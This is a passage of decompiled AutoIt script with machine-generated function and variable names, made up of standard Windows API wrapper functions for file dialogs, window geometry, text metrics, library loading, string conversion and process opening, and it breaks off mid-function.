- DLLSTRUCTSETDATA($Local0039 ,"InitDir" ,$Var0140 )
- DLLSTRUCTSETDATA($Local003B ,"Path" ,$Var0141 )
- DLLSTRUCTSETDATA($Local003C ,"Extension" ,$Var0142 )
- DLLSTRUCTSETDATA($Local0033 ,"StructSize",DLLSTRUCTGETSIZE($Local0033 ))
- DLLSTRUCTSETDATA($Local0033 ,"hwndOwner" ,$Var0145 )
- DLLSTRUCTSETDATA($Local0033 ,"lpstrFilter",DLLSTRUCTGETPTR($Local003A ))
- DLLSTRUCTSETDATA($Local0033 ,"nFilterIndex",$Var0143 )
- DLLSTRUCTSETDATA($Local0033 ,"lpstrFile" ,DLLSTRUCTGETPTR($Local003B ))
- DLLSTRUCTSETDATA($Local0033 ,"nMaxFile" ,$Local0031 )
- DLLSTRUCTSETDATA($Local0033 ,"lpstrInitialDir",DLLSTRUCTGETPTR($Local0039 ))
- DLLSTRUCTSETDATA($Local0033 ,"lpstrTitle",DLLSTRUCTGETPTR($Local0038 ))
- DLLSTRUCTSETDATA($Local0033 ,"Flags" ,$Local0035 )
- DLLSTRUCTSETDATA($Local0033 ,"lpstrDefExt",DLLSTRUCTGETPTR($Local003C ))
- DLLSTRUCTSETDATA($Local0033 ,"FlagsEx" ,$Var0144 )
- DLLCALL("comdlg32.dll","bool" ,"GetOpenFileNameW","struct*" ,$Local0033 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,$Local0034 )
- IF BITAND($Local00AB ,$Var00CA )=$Var00CA AND BITAND($Local00AB ,$Var00DA )=$Var00DA THEN
- FOR $Var0149 = 1 TO $Local0031
- IF DLLSTRUCTGETDATA($Local003B ,"Path" ,$Var0149 )=CHR( 0 )THEN
- DLLSTRUCTSETDATA($Local003B ,"Path" ,"|" ,$Var0149 )
- $Local0032 += 1
- ELSE
- $Local0032 = 0
- ENDIF
- IF $Local0032 = 2 THEN EXITLOOP
- NEXT
- DLLSTRUCTSETDATA($Local003B ,"Path" ,CHR( 0 ),$Var0149 - 1 )
- $Local0034 =STRINGSPLIT(DLLSTRUCTGETDATA($Local003B ,"Path" ),"|" )
- IF $Local0034 [ 0 ]= 1 THEN RETURN Fn0097(DLLSTRUCTGETDATA($Local003B ,"Path" ))
- RETURN STRINGSPLIT(DLLSTRUCTGETDATA($Local003B ,"Path" ),"|" )
- ELSEIF BITAND($Local00AB ,$Var00CA )=$Var00CA THEN
- $Local0034 =STRINGSPLIT(DLLSTRUCTGETDATA($Local003B ,"Path" )," " )
- IF $Local0034 [ 0 ]= 1 THEN RETURN Fn0097(DLLSTRUCTGETDATA($Local003B ,"Path" ))
- RETURN STRINGSPLIT(STRINGREPLACE(DLLSTRUCTGETDATA($Local003B ,"Path" )," " ,"|" ),"|" )
- ELSE
- RETURN Fn0097(DLLSTRUCTGETDATA($Local003B ,"Path" ))
- ENDIF
- ENDFUNC
- Func Fn0061($Arg00,$Arg01,BYREF $ArgRef02,$ArgOpt03=FALSE )
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"GetOverlappedResult","handle" ,$Arg00,"ptr" ,$Arg01,"dword*" , 0 ,"bool" ,$ArgOpt03)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- $ArgRef02=$Local000E [ 3 ]
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0062($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"GetParent" ,"hwnd" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0063($Arg00)
- LOCAL $Local000E =DLLCALL("kernel32.dll","bool" ,"GetProcessAffinityMask","handle" ,$Arg00,"dword_ptr*", 0 ,"dword_ptr*", 0 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- LOCAL $Local003D [ 3 ]
- $Local003D [ 0 ]=TRUE
- $Local003D [ 1 ]=$Local000E [ 2 ]
- $Local003D [ 2 ]=$Local000E [ 3 ]
- RETURN $Local003D
- ENDFUNC
- Func Fn0064($ArgOpt00="",$ArgOpt01="All files (*.*)",$Var0140 =".",$Var0141 ="",$Var0142 ="",$Var0143 =1,$Local00AB =0,$Var0144 =0,$Var0145 =0)
- LOCAL $Local0031 =0x1000
- LOCAL $Local0033 =DLLSTRUCTCREATE($Var0146 )
- LOCAL $Local0034 [ 1 ]=[ 0 ]
- LOCAL $Local0035 =$Local00AB
- LOCAL $Local0036 =STRINGSPLIT($ArgOpt01,"|" )
- LOCAL $Local0037 [$Local0036 [ 0 ]* 2 + 1 ]
- LOCAL $Local00BF ,$Var0147 ,$Var0148
- $Local0037 [ 0 ]=$Local0036 [ 0 ]* 2
- FOR $Local00EB = 1 TO $Local0036 [ 0 ]
- $Local00BF =STRINGINSTR($Local0036 [$Local00EB ],"(" , 0 , 1 )
- $Var0147 =STRINGINSTR($Local0036 [$Local00EB ],")" , 0 ,- 1 )
- $Local0037 [$Local00EB * 2 - 1 ]=STRINGSTRIPWS(STRINGLEFT($Local0036 [$Local00EB ],$Local00BF - 1 ), 3 )
- $Local0037 [$Local00EB * 2 ]=STRINGSTRIPWS(STRINGTRIMRIGHT(STRINGTRIMLEFT($Local0036 [$Local00EB ],$Local00BF ),STRINGLEN($Local0036 [$Local00EB ])-$Var0147 + 1 ), 3 )
- $Var0148 &="wchar[" &STRINGLEN($Local0037 [$Local00EB * 2 - 1 ])+ 1 &"];wchar[" &STRINGLEN($Local0037 [$Local00EB * 2 ])+ 1 &"];"
- NEXT
- LOCAL $Local0038 =DLLSTRUCTCREATE("wchar Title["&STRINGLEN($ArgOpt00)+ 1 &"]" )
- LOCAL $Local0039 =DLLSTRUCTCREATE("wchar InitDir["&STRINGLEN($Var0140 )+ 1 &"]" )
- LOCAL $Local003A =DLLSTRUCTCREATE($Var0148 &"wchar" )
- LOCAL $Local003B =DLLSTRUCTCREATE("wchar Path["&$Local0031 &"]" )
- LOCAL $Local003C =DLLSTRUCTCREATE("wchar Extension["&STRINGLEN($Var0142 )+ 1 &"]" )
- FOR $Local00EB = 1 TO $Local0037 [ 0 ]
- DLLSTRUCTSETDATA($Local003A ,$Local00EB ,$Local0037 [$Local00EB ])
- NEXT
- DLLSTRUCTSETDATA($Local0038 ,"Title" ,$ArgOpt00)
- DLLSTRUCTSETDATA($Local0039 ,"InitDir" ,$Var0140 )
- DLLSTRUCTSETDATA($Local003B ,"Path" ,$Var0141 )
- DLLSTRUCTSETDATA($Local003C ,"Extension" ,$Var0142 )
- DLLSTRUCTSETDATA($Local0033 ,"StructSize",DLLSTRUCTGETSIZE($Local0033 ))
- DLLSTRUCTSETDATA($Local0033 ,"hwndOwner" ,$Var0145 )
- DLLSTRUCTSETDATA($Local0033 ,"lpstrFilter",DLLSTRUCTGETPTR($Local003A ))
- DLLSTRUCTSETDATA($Local0033 ,"nFilterIndex",$Var0143 )
- DLLSTRUCTSETDATA($Local0033 ,"lpstrFile" ,DLLSTRUCTGETPTR($Local003B ))
- DLLSTRUCTSETDATA($Local0033 ,"nMaxFile" ,$Local0031 )
- DLLSTRUCTSETDATA($Local0033 ,"lpstrInitialDir",DLLSTRUCTGETPTR($Local0039 ))
- DLLSTRUCTSETDATA($Local0033 ,"lpstrTitle",DLLSTRUCTGETPTR($Local0038 ))
- DLLSTRUCTSETDATA($Local0033 ,"Flags" ,$Local0035 )
- DLLSTRUCTSETDATA($Local0033 ,"lpstrDefExt",DLLSTRUCTGETPTR($Local003C ))
- DLLSTRUCTSETDATA($Local0033 ,"FlagsEx" ,$Var0144 )
- DLLCALL("comdlg32.dll","bool" ,"GetSaveFileNameW","struct*" ,$Local0033 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,$Local0034 )
- RETURN Fn0097(DLLSTRUCTGETDATA($Local003B ,"Path" ))
- ENDFUNC
- Func Fn0065($Arg00)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"handle" ,"GetStockObject","int" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0066($Arg00)
- IF $Arg00< 0 OR $Arg00> 2 THEN RETURN SETERROR( 2 , 0 ,- 1 )
- LOCAL CONST $Var014A [ 3 ]=[- 10 ,-0x000B ,-0x000C ]
- LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"GetStdHandle","dword" ,$Var014A [$Arg00])
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0067($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","dword" ,"GetSysColor","int" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0068($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","handle" ,"GetSysColorBrush","int" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0069($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","int" ,"GetSystemMetrics","int" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn006A($Arg00,$Arg01)
- LOCAL $Local003E =DLLSTRUCTCREATE($Var014B )
- LOCAL $Local003F =STRINGLEN($Arg01)
- DLLCALL("gdi32.dll" ,"bool" ,"GetTextExtentPoint32W","handle" ,$Arg00,"wstr" ,$Arg01,"int" ,$Local003F ,"struct*" ,$Local003E )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local003E
- ENDFUNC
- Func Fn006B($Arg00)
- LOCAL $Local0040 =DLLSTRUCTCREATE($Var014C )
- LOCAL $Local0041 =DLLCALL("gdi32.dll" ,"bool" ,"GetTextMetricsW","handle" ,$Arg00,"struct*" ,$Local0040 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- IF NOT $Local0041 [ 0 ]THEN RETURN SETERROR(- 1 , 0 , 0 )
- RETURN $Local0040
- ENDFUNC
- Func Fn006C($Arg00,$Arg01)
- LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"GetWindow" ,"hwnd" ,$Arg00,"uint" ,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn006D($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","handle" ,"GetWindowDC","hwnd" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn006E($Arg00)
- LOCAL $Local0017 =Fn0071($Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN DLLSTRUCTGETDATA($Local0017 ,"Bottom" )-DLLSTRUCTGETDATA($Local0017 ,"Top" )
- ENDFUNC
- Func Fn006F($Arg00,$Arg01)
- LOCAL $Local0042 ="GetWindowLongW"
- IF @AutoItX64 THEN $Local0042 ="GetWindowLongPtrW"
- LOCAL $Local000E =DLLCALL("user32.dll","long_ptr" ,$Local0042 ,"hwnd" ,$Arg00,"int" ,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0070($Arg00)
- LOCAL $Local0043 =DLLSTRUCTCREATE($Var014D )
- DLLSTRUCTSETDATA($Local0043 ,"length" ,DLLSTRUCTGETSIZE($Local0043 ))
- DLLCALL("user32.dll","bool" ,"GetWindowPlacement","hwnd" ,$Arg00,"struct*" ,$Local0043 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local0043
- ENDFUNC
- Func Fn0071($Arg00)
- LOCAL $Local0017 =DLLSTRUCTCREATE($Var013C )
- DLLCALL("user32.dll","bool" ,"GetWindowRect","hwnd" ,$Arg00,"struct*" ,$Local0017 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local0017
- ENDFUNC
- Func Fn0072($Arg00,$Arg01)
- LOCAL $Local000E =DLLCALL("user32.dll","int" ,"GetWindowRgn","hwnd" ,$Arg00,"handle" ,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0073($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","int" ,"GetWindowTextW","hwnd" ,$Arg00,"wstr" ,"","int" ,0x1000 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
- RETURN SETEXTENDED($Local000E [ 0 ],$Local000E [ 2 ])
- ENDFUNC
- Func Fn0074($Arg00,BYREF $ArgRef01)
- LOCAL $Local000E =DLLCALL("user32.dll","dword" ,"GetWindowThreadProcessId","hwnd" ,$Arg00,"dword*" , 0 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- $ArgRef01=$Local000E [ 2 ]
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0075($Arg00)
- LOCAL $Local0017 =Fn0071($Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN DLLSTRUCTGETDATA($Local0017 ,"Right" )-DLLSTRUCTGETDATA($Local0017 ,"Left" )
- ENDFUNC
- Func Fn0076(BYREF $ArgRef00,BYREF $ArgRef01,BYREF $ArgRef02)
- $ArgRef01=DLLSTRUCTGETDATA($ArgRef00,"X" )
- $ArgRef02=DLLSTRUCTGETDATA($ArgRef00,"Y" )
- ENDFUNC
- Func Fn0077()
- LOCAL $Local0044 =DLLSTRUCTCREATE($Var0115 )
- LOCAL $Local0045 =DLLSTRUCTGETSIZE($Local0044 )
- DLLSTRUCTSETDATA($Local0044 , 1 ,$Local0045 )
- DLLCALL("kernel32.dll","none" ,"GlobalMemoryStatusEx","ptr" ,$Local0044 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- LOCAL $Local0046 [ 7 ]
- $Local0046 [ 0 ]=DLLSTRUCTGETDATA($Local0044 , 2 )
- $Local0046 [ 1 ]=DLLSTRUCTGETDATA($Local0044 , 3 )
- $Local0046 [ 2 ]=DLLSTRUCTGETDATA($Local0044 , 4 )
- $Local0046 [ 3 ]=DLLSTRUCTGETDATA($Local0044 , 5 )
- $Local0046 [ 4 ]=DLLSTRUCTGETDATA($Local0044 , 6 )
- $Local0046 [ 5 ]=DLLSTRUCTGETDATA($Local0044 , 7 )
- $Local0046 [ 6 ]=DLLSTRUCTGETDATA($Local0044 , 8 )
- RETURN $Local0046
- ENDFUNC
- Func Fn0078($Arg00)
- LOCAL $Local0047 =DLLSTRUCTCREATE($Var014E )
- Fn0079($Arg00,$Local0047 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local0047
- ENDFUNC
- Func Fn0079($Arg00,$Arg01)
- LOCAL $Local000E =DLLCALL("ole32.dll" ,"long" ,"CLSIDFromString","wstr" ,$Arg00,"struct*" ,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn007A($Arg00)
- RETURN BITSHIFT($Arg00,0x0010 )
- ENDFUNC
- Func Fn007B($Arg00,BYREF $ArgRef01)
- IF $Arg00=$ArgRef01 THEN RETURN TRUE
- FOR $Var014F =$Var001D [ 0 ][ 0 ]TO 1 STEP - 1
- IF $Arg00=$Var001D [$Var014F ][ 0 ]THEN
- IF $Var001D [$Var014F ][ 1 ]THEN
- $ArgRef01=$Arg00
- RETURN TRUE
- ELSE
- RETURN FALSE
- ENDIF
- ENDIF
- NEXT
- LOCAL $Local0070
- Fn0074($Arg00,$Local0070 )
- LOCAL $Local001D =$Var001D [ 0 ][ 0 ]+ 1
- IF $Local001D >=0x0040 THEN $Local001D = 1
- $Var001D [ 0 ][ 0 ]=$Local001D
- $Var001D [$Local001D ][ 0 ]=$Arg00
- $Var001D [$Local001D ][ 1 ]=($Local0070 = @AutoItPID )
- RETURN $Var001D [$Local001D ][ 1 ]
- ENDFUNC
- Func Fn007C($Arg00)
- LOCAL $Local0023 =DLLSTRUCTCREATE("int" )
- LOCAL $Local0022 =DLLSTRUCTCREATE("float" ,DLLSTRUCTGETPTR($Local0023 ))
- DLLSTRUCTSETDATA($Local0023 , 1 ,$Arg00)
- RETURN DLLSTRUCTGETDATA($Local0022 , 1 )
- ENDFUNC
- Func Fn007D($Arg00,$Arg01)
- LOCAL $Local0048 =OPT("GUIDataSeparatorChar")
- LOCAL $Local0049 =STRINGSPLIT($Arg01,$Local0048 )
- IF NOT ISHWND($Arg00)THEN $Arg00=GUICTRLGETHANDLE($Arg00)
- LOCAL $Local004A =Fn0045($Arg00)
- FOR $Var0149 = 1 TO UBOUND($Local0049 )- 1
- IF STRINGUPPER(STRINGMID($Local004A , 1 ,STRINGLEN($Local0049 [$Var0149 ])))=STRINGUPPER($Local0049 [$Var0149 ])THEN RETURN TRUE
- NEXT
- RETURN FALSE
- ENDFUNC
- Func Fn007E($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"IsWindow" ,"hwnd" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn007F($Arg00)
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"IsWindowVisible","hwnd" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0080($Arg00,$ArgOpt01=0,$ArgOpt02=TRUE )
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"InvalidateRect","hwnd" ,$Arg00,"struct*" ,$ArgOpt01,"bool" ,$ArgOpt02)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0081($Arg00,$Arg01,$Arg02)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"bool" ,"LineTo" ,"handle" ,$Arg00,"int" ,$Arg01,"int" ,$Arg02)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0082($Arg00,$Arg01)
- LOCAL $Local004B ="int"
- IF ISSTRING($Arg01)THEN $Local004B ="wstr"
- LOCAL $Local000E =DLLCALL("user32.dll","handle" ,"LoadBitmapW","handle" ,$Arg00,$Local004B ,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0083($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05)
- LOCAL $Local000E ,$Var0150 ="int"
- IF ISSTRING($Arg01)THEN $Var0150 ="wstr"
- $Local000E =DLLCALL("user32.dll","handle" ,"LoadImageW","handle" ,$Arg00,$Var0150 ,$Arg01,"uint" ,$Arg02,"int" ,$Arg03,"int" ,$Arg04,"uint" ,$Arg05)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0084($Arg00)
- LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"LoadLibraryW","wstr" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0085($Arg00,$ArgOpt01=0)
- LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"LoadLibraryExW","wstr" ,$Arg00,"ptr" , 0 ,"dword" ,$ArgOpt01)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0086($Arg00)
- LOCAL $Local004C =DLLSTRUCTCREATE("ptr Data" )
- LOCAL $Local004D =Fn0036("shell32.dll",$Arg00, 0 ,$Local004C , 1 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- IF $Local004D <= 0 THEN RETURN SETERROR( 1 , 0 , 0 )
- RETURN DLLSTRUCTGETDATA($Local004C ,"Data" )
- ENDFUNC
- Func Fn0087($Arg00,$Arg01)
- LOCAL $Local000E =DLLCALL("user32.dll","int" ,"LoadStringW","handle" ,$Arg00,"uint" ,$Arg01,"wstr" ,"","int" ,0x1000 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
- RETURN SETEXTENDED($Local000E [ 0 ],$Local000E [ 3 ])
- ENDFUNC
- Func Fn0088($Arg00)
- LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"LocalFree" ,"handle" ,$Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0089($Arg00)
- RETURN BITAND($Arg00,0xFFFF )
- ENDFUNC
- Func Fn008A($Arg00,$Arg01)
- RETURN BITOR(BITSHIFT($Arg01,- 10 ),$Arg00)
- ENDFUNC
- Func Fn008B($Arg00,$Arg01)
- RETURN BITOR(BITSHIFT($Arg01,-0x0010 ),$Arg00)
- ENDFUNC
- Func Fn008C($Arg00,$Arg01)
- RETURN BITOR(BITSHIFT($Arg01,-0x0010 ),BITAND($Arg00,0xFFFF ))
- ENDFUNC
- Func Fn008D($Arg00,$Arg01)
- LOCAL $Local004E =DLLSTRUCTCREATE("uint64" )
- LOCAL $Local004F =DLLSTRUCTCREATE("dword;dword",DLLSTRUCTGETPTR($Local004E ))
- DLLSTRUCTSETDATA($Local004F , 1 ,$Arg00)
- DLLSTRUCTSETDATA($Local004F , 2 ,$Arg01)
- RETURN DLLSTRUCTGETDATA($Local004E , 1 )
- ENDFUNC
- Func Fn008E($ArgOpt00=1)
- LOCAL $Var0151
- SWITCH $ArgOpt00
- CASE 1
- $Var0151 = 0
- CASE 2
- $Var0151 =0x0010
- CASE 3
- $Var0151 =0x0020
- CASE 4
- $Var0151 =0x0030
- CASE 5
- $Var0151 =0x0040
- CASE ELSE
- $Var0151 =- 1
- ENDSWITCH
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"MessageBeep","uint" ,$Var0151 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn008F($Arg00,$Arg01,$Arg02)
- BLOCKINPUT( 0 )
- MSGBOX($Arg00,$Arg01,$Arg02&" " )
- ENDFUNC
- Func Fn0090($Arg00,$ArgOpt01=0,$ArgOpt02=0,$ArgOpt03=0,$ArgOpt04=0)
- DLLCALL("user32.dll","none" ,"mouse_event","dword" ,$Arg00,"dword" ,$ArgOpt01,"dword" ,$ArgOpt02,"dword" ,$ArgOpt03,"ulong_ptr" ,$ArgOpt04)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED)
- ENDFUNC
- Func Fn0091($Arg00,$Arg01,$Arg02)
- LOCAL $Local000E =DLLCALL("gdi32.dll" ,"bool" ,"MoveToEx" ,"handle" ,$Arg00,"int" ,$Arg01,"int" ,$Arg02,"ptr" , 0 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0092($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$ArgOpt05=TRUE )
- LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"MoveWindow","hwnd" ,$Arg00,"int" ,$Arg01,"int" ,$Arg02,"int" ,$Arg03,"int" ,$Arg04,"bool" ,$ArgOpt05)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0093($Arg00,$Arg01,$Arg02)
- LOCAL $Local000E =DLLCALL("kernel32.dll","int" ,"MulDiv" ,"int" ,$Arg00,"int" ,$Arg01,"int" ,$Arg02)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,- 1 )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0094($Arg00,$ArgOpt01=0,$ArgOpt02=0,$ArgOpt03=FALSE )
- LOCAL $Local0050 ="str"
- IF NOT ISSTRING($Arg00)THEN $Local0050 ="struct*"
- LOCAL $Local000E =DLLCALL("kernel32.dll","int" ,"MultiByteToWideChar","uint" ,$ArgOpt01,"dword" ,$ArgOpt02,$Local0050 ,$Arg00,"int" ,- 1 ,"ptr" , 0 ,"int" , 0 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- LOCAL $Local0051 =$Local000E [ 0 ]
- LOCAL $Local0052 =DLLSTRUCTCREATE("wchar[" &$Local0051 &"]" )
- $Local000E =DLLCALL("kernel32.dll","int" ,"MultiByteToWideChar","uint" ,$ArgOpt01,"dword" ,$ArgOpt02,$Local0050 ,$Arg00,"int" ,- 1 ,"struct*" ,$Local0052 ,"int" ,$Local0051 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- IF $ArgOpt03 THEN RETURN DLLSTRUCTGETDATA($Local0052 , 1 )
- RETURN $Local0052
- ENDFUNC
- Func Fn0095($Arg00,$Arg01,$ArgOpt02=0,$ArgOpt03=0)
- LOCAL $Local000E =DLLCALL("kernel32.dll","int" ,"MultiByteToWideChar","uint" ,$ArgOpt02,"dword" ,$ArgOpt03,"STR" ,$Arg00,"int" ,- 1 ,"struct*" ,$Arg01,"int" ,(STRINGLEN($Arg00)+ 1 )* 2 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- RETURN $Local000E [ 0 ]
- ENDFUNC
- Func Fn0096($Arg00,$Arg01,$Arg02,$ArgOpt03=FALSE )
- LOCAL $Local000E =DLLCALL("kernel32.dll","handle" ,"OpenProcess","dword" ,$Arg00,"bool" ,$Arg01,"dword" ,$Arg02)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- IF $Local000E [ 0 ]THEN RETURN $Local000E [ 0 ]
- IF NOT $ArgOpt03 THEN RETURN 0
- LOCAL $Local0001 =Fn0000(BITOR($Var0152 ,$Var0153 ))
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- Fn0001($Local0001 ,"SeDebugPrivilege",TRUE )
- LOCAL $Local0053 =@ERROR
- LOCAL $Local0054 =@EXTENDED
- LOCAL $Local0055 = 0
- IF NOT @ERROR THEN
- $Local000E =DLLCALL("kernel32.dll","handle" ,"OpenProcess","dword" ,$Arg00,"bool" ,$Arg01,"dword" ,$Arg02)
- $Local0053 =@ERROR
- $Local0054 =@EXTENDED
- IF $Local000E [ 0 ]THEN $Local0055 =$Local000E [ 0 ]
- Fn0001($Local0001 ,"SeDebugPrivilege",FALSE )
- IF @ERROR THEN
- $Local0053 =@ERROR
- $Local0054 =@EXTENDED
- ENDIF
- ENDIF
- Fn000F($Local0001 )
- RETURN SETERROR($Local0053 ,$Local0054 ,$Local0055 )
- ENDFUNC
- Func Fn0097($Arg00)
- LOCAL $Local0034 [ 3 ]
- $Local0034 [ 0 ]= 2
- LOCAL $Local0056 =STRINGMID($Arg00, 1 ,STRINGINSTR($Arg00,"\" , 0 ,- 1 )- 1 )
- $Local0034 [ 1 ]=$Local0056
- $Local0034 [ 2 ]=STRINGMID($Arg00,STRINGINSTR($Arg00,"\" , 0 ,- 1 )+ 1 )
- RETURN $Local0034
- ENDFUNC
- Func Fn0098(CONST $ArgC00,$ArgOpt01="",CONST $ArgCOpt02=@LF)
- LOCAL $Local0057 = 0
- IF ISSTRING($ArgOpt01)THEN
- IF STRINGLEN($ArgOpt01)THEN
- $ArgOpt01=STRINGSPLIT($ArgOpt01,$ArgCOpt02, 1 + 2 )
- $Local0057 =UBOUND($ArgOpt01, 1 )
- ENDIF
- ELSEIF ISARRAY($ArgOpt01)THEN
- $Local0057 =UBOUND($ArgOpt01)
- ENDIF
- LOCAL $Var0154 ,$Var0155
- IF $Local0057 THEN
- LOCAL $Local0058 =""
- FOR $Var0156 IN $ArgOpt01
- $Local0058 &="wchar[" &STRINGLEN($Var0156 )+ 1 &"];"
- NEXT
- $Var0154 =DLLSTRUCTCREATE($Local0058 )
- $Var0155 =DLLSTRUCTCREATE("ptr[" &$Local0057 + 1 &"]" )
- FOR $Local00EB = 1 TO $Local0057
- DLLSTRUCTSETDATA($Var0154 ,$Local00EB ,$ArgOpt01[$Local00EB - 1 ])
- DLLSTRUCTSETDATA($Var0155 , 1 ,DLLSTRUCTGETPTR($Var0154 ,$Local00EB ),$Local00EB )
- NEXT
- DLLSTRUCTSETDATA($Var0155 , 1 ,PTR( 0 ),$Local0057 + 1 )
- ENDIF
- LOCAL $Local000E =DLLCALL("shlwapi.dll","bool" ,"PathFindOnPathW","wstr" ,$ArgC00,"struct*" ,$Var0155 )
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
- IF $Local000E [ 0 ]= 0 THEN RETURN SETERROR( 1 , 0 ,$ArgC00)
- RETURN $Local000E [ 1 ]
- ENDFUNC
- Func Fn0099(BYREF $ArgRef00,$ArgOpt01=TRUE )
